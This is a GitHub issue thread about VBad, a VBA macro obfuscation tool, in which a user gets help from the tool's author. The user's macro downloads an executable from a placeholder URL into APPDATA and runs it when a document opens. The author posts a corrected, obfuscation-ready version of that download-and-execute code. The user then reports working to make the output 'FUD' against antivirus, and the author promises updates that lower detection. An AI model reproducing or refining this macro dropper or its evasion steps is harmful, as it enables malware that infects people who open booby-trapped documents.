### ISSUE TITLE
The Trigger Function name has not been found in the vba, trigger point cannot be set.

### ISSUE THREAD

**Issue by eternal1502** [Pepitoh/VBad#3]
I get this error on my windows command prompt. "The Trigger Function name has not been found in the vba, trigger point cannot be set." I dont know wat am doing wrong, as am just a beginner on Python. Any help please.

**Comment by Pepitoh** [comment]
HI eternal1502,

As mentionned in the Readme, you need to set in your _cont.py_   the variable 
`trigger_function_name` with the name of one of your function in your orignal VBA file.

This function will be obfuscated and trigger automaticly with the auto-function you choosed in auto_function_macro variable (onOpen or onClose). 

The error you get means that the script did not managed to locate the function trigger_function_name in your orignal VBA file, and it was not able to included it in an auto-function :-), check if the function name you put really exist in your original VBA file.

**Comment by eternal1502** [comment]
![screenshot_2](https://cloud.githubusercontent.com/assets/19981436/16198057/5fae593c-36fc-11e6-8186-cb5823d348e0.png)
![screenshot_3](https://cloud.githubusercontent.com/assets/19981436/16198059/6038c0a4-36fc-11e6-83a0-f3449b090f61.png)
[original_vba - Copy.txt](https://github.com/Pepitoh/VBad/files/323631/original_vba.-.Copy.txt)
[original_vba_prepared.txt](https://github.com/Pepitoh/VBad/files/323630/original_vba_prepared.txt)


Yes the function exists in the original VBA file, as Public Function, but i still get the same error. 

I have attached the command prompt error showing the trigger_function_name, 
Also attached the edited _const.py_ file where I have set the Public Function "CDNyMsLunLnKjDF" as the trigger_function_name.
Finally attached the original_vba file showing my VBA script which has the Public Function "CDNyMsLunLnKjDF" in it. 

Pls take a look and advice, and thanks a lot for taking the time to help me out.

PS :: Also you said _cont.py_ but wat i have from the downloaded files is _const.py_ are they the same thing or am i missing something.

**Comment by eternal1502** [comment]
Note I converted the _original_vba_ and _original_vba_prepared_ to txt files so i can attach them here.

**Comment by Pepitoh** [comment]
Hi,

I see, yes, mispelling I wanted to say _const.py_ :)

Sorry but i do not really understand what you want to do. You sent me two `original_vba ` files which seems to be already obfuscated with VBad - functions name, ciphering function and storing key are already implemented -. If you try yo _VBad_ it again, it will for sure not work because most of functions and variables are already in use in your generated vba file. 

Could you send me your **non-VBAd-obfuscated** `original_vba` file (with markdown such as [rdm::8] see if I see a problem in there?

Thx.

**Comment by eternal1502** [comment]
[original vba.txt](https://github.com/Pepitoh/VBad/files/323758/original.vba.txt)

Is this wat u mean?
wat should i use as trigger function name in this script.

**Comment by Pepitoh** [comment]
Ok, I see.

In your orignal VBA file, you have already an autotrigger function, which makes no sense since VBAd aims to automaticly integrate your function to an autotrigger process. 

You need to rename your `Document_open() `function to something like "`Function_trigger()`" that you have then to indicated in your _const.py_. With this, VBAd will know which function to trigger and will automaticly integrate it in the `auto_function_macro ` -onOpen or onClose-, by doing this everything should work find.

**Comment by eternal1502** [comment]
Hey bro, I tried that, and it still didnt work.
I also tried with the VBS code below, I tried it as it is, and I tried renaming the Document_open() function to  "Function_trigger()" it didnt work either. Pls wat am I doing wrong. Also if you dont mind we could talk on skype as it will be easier for me to ask for help and advice that way. Let me know. Thanks a lot for your help. 

Option Explicit

Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong

Private Sub Document_Open()
Call YourSub
End Sub

Private Sub YourSub()
Dim sUrl As String, sPath As String
sUrl = "http://www.domain.com"
sPath = Environ("APPDATA") & "\Examples.exe"
Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
Call fExecuteUnicode(0, StrPtr("Open"), StrPtr(sPath), 0, 0, 1)
End Sub




P.S :  By the way it works fine when I use the original vbs script from your post.

Function [rdm::15]Test_Function(ByVal [rdm::10]FileToTest As String) As Boolean
   FileExists = (Dir(FileToTest) <> "")
End Function

Public Function [rdm::15]Test()
	[rdm::8]kikou = "AZERTY1234"
	[rdm::15]test3 = "HELLO_WORLD"
	[rdm::5]Excluded_string = "ExcludedString[!!]"
	MsgBox test3
	[rdm::12]domain_list = [var::domain_name]
	[rdm::4]path = [var::path_to_save] 
	msgbox domain_list
	msgbox path
	
End Function

**Comment by eternal1502** [comment]
Also if the problem is with the VBS code am using, maybe u could give me a simple download and execute VBS script that will work with VBAD, so I can try that out. Thanks again.

**Comment by eternal1502** [comment]
Didnt get any response from you yet. Hope u can still help me with this as I will really like to get it to work.

**Comment by Pepitoh** [comment]
Hi, 

Sorry for delay :-)
So, first of all, your VBA doesn't seem to work in my Test plateform (without any obfuscation, but nevermind). Here is some change you can make on your VBA to make it work with VBad : 

First of all, don't forget that VBad will automatically wrapp your ```trigger_function_name``` to an onOpen fuction or onClose (```auto_function_macro``` in ```const.py```) so you can remove it from your orignal_vba file. 

After that, my script will work only if you obfuscate the ```trigger_function_name``` (that is how it works) so you need to markdown your trigger function name with ```[rdm::10]``` for example. 

And, don't forget to mark exceptions on your first Alias. Unfortunatly, VBA needs strings for setting up Aliases. So this example of code has been succefully with Vbad : 

```vbs
Option Explicit

Private Declare PtrSafe Function [rdm::10]fDownloadUnicode Lib "urlmon[!!]" Alias "URLDownloadToFileW[!!]" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
Private Declare PtrSafe Function [rdm::10]fExecuteUnicode Lib "shell32.dll[!!]" Alias "ShellExecuteW[!!]" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong


Private Function [rdm::10]YourSub()
Dim [rdm::4]sUrl As String, [rdm::10]sPath As String
sUrl = "http://www.domain.com"
sPath = Environ("APPDATA") & "\Examples.exe"
Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
Call fExecuteUnicode(0, StrPtr("Open"), StrPtr(sPath), 0, 0, 1)
End Function
```

With of course, ```trigger_function_name =  "YourSub"``` in your ```const.py```. I get a VBA error once the file generated but I let you fix it since it's now more a VBA issue than a VBad one :-).

Hope it helps.

Cheers

**Comment by eternal1502** [comment]
You're right bro. Now VBAD works in obfuscating the code. But I cant seem to fix the error wit my code. "user defined type not defined" and the problem i thin is from dis line

"Private Declare PtrSafe Function [rdm::10]fDownloadUnicode Lib "urlmon[!!]" Alias "URLDownloadToFileW[!!]" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong"

I know dis is not a vbad issue, but am still new to vba and coding in general and am having to teach myself. So pls any help will be very much appreciated. Thanks again.

**Comment by eternal1502** [comment]
Hey buddy, thanks alot for your help. I finally got it to work. I have one issue though. Wen i enable macros on the file wit d obfuscated code, i get a U.A.C prompt, b4 the downloaded file is executed. But wen i enable macros on the file wit the same code but unobfuscated, it runs witout U.A.C prompt. So am thinking it might have sumtin to do wit VBAD obfuscation. Wat do you think?

P.S : I know i have been a pain, but thanks for your patience and help. Really appreciate.

**Comment by eternal1502** [comment]
Hey buddy, thanks alot for your help. I finally got it to work. I have one issue though. Wen i enable macros on the file wit d obfuscated code, i get a U.A.C prompt, b4 the downloaded file is executed. But wen i enable macros on the file wit the same code but unobfuscated, it runs witout U.A.C prompt. So am thinking it might have sumtin to do wit VBAD obfuscation. Wat do you think?

P.S : I know i have been a pain, but thanks for your patience and help. Really appreciate.

**Comment by eternal1502** [comment]
All set now. Now everything works like a charm. Still playing arnd with the hide variable function to see if it will make the output file FUD, now it gets like 3 detections, but YOU ARE THE MAN!!!! THANKS A BUNCH.

I know this is meant to work with VBA macros, but I was also wondering, if you have something else like this that works for obfuscating and refudding .py code.

**Comment by Pepitoh** [comment]
Hi,

Cool! Glad I could help you :-).
Regarding other things, some update are to come that should decrease detection level, stay in touch!

Cheers.

**Comment by eternal1502** [comment]
Okay bro, thnx for ur hardwork.
